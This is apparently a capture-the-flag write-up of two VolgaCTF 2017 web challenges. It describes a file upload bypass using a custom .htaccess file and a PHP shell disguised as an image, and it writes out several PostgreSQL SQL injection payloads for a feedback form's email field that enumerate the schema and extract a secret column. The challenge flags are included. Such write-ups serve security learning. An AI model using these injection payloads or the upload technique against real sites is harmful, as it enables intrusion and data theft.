Share Points VolgaCTF 2017

Web 200pts

Share Point
Look! I wrote a good service for sharing your files with your friends, enjoy)
share-point.quals.2017.volgactf.ru

The link leads you to a website where have to login to continue. I logged in
with a custom username and password. Now you can upload and share you images.

There was a file upload vulnerability. So using that vulnerability, you can upload
any image and then change it to a PHP file. For that, I first uploaded my .htaccess file. Now I uploaded a PHP shell to print output the flag. Then I went to Files and I could see both of my files.

I opened file.php.jpg to read the flag. The flag was VolgaCTF{AnoTHer_apProOAch_to_file_UplOAd_PhP}

 

Bloody Feedback, VolgaCTF 2017

Web 100pts

Bloody Feedback
Send your feedback at bloody-feedback.quals.2017.volgactf.ru
DO. NOT. USE. SQLMAP
Otherwise your IP will be banned

We have given a feedback form to submit name, email and message, and the email was disabled by default. 

After playing around a while I figured out that The feedback we submit without email is only being displayed in Top messages. So there should be something with the email. I opened the requested in Burp and modified the email to test@test.com' and I got this error

After googling the error I found that the database is Postgress. So I intercepted requests and modified it using Burp.
name=test&email=test@test.com',(select table_name from information_schema.tables limit 1 offset 1))-- -&message=test
The table name was s3cret_tabl3

name=test&email=test@test.com',(select column_name from information_schema.columns where table_name like ('s3cret_tabl3') limit 1 offset 0))-- -&message=test
Column name is s3cr3tc0lumn

Combaining both,  
name=test&email=test@test.com',(select s3cr3tc0lumn from s3cret_tabl3 limit 1 offset 4))-- -&message=test  
And the flag was VolgaCTF{eiU7UJhyeu@ud3*}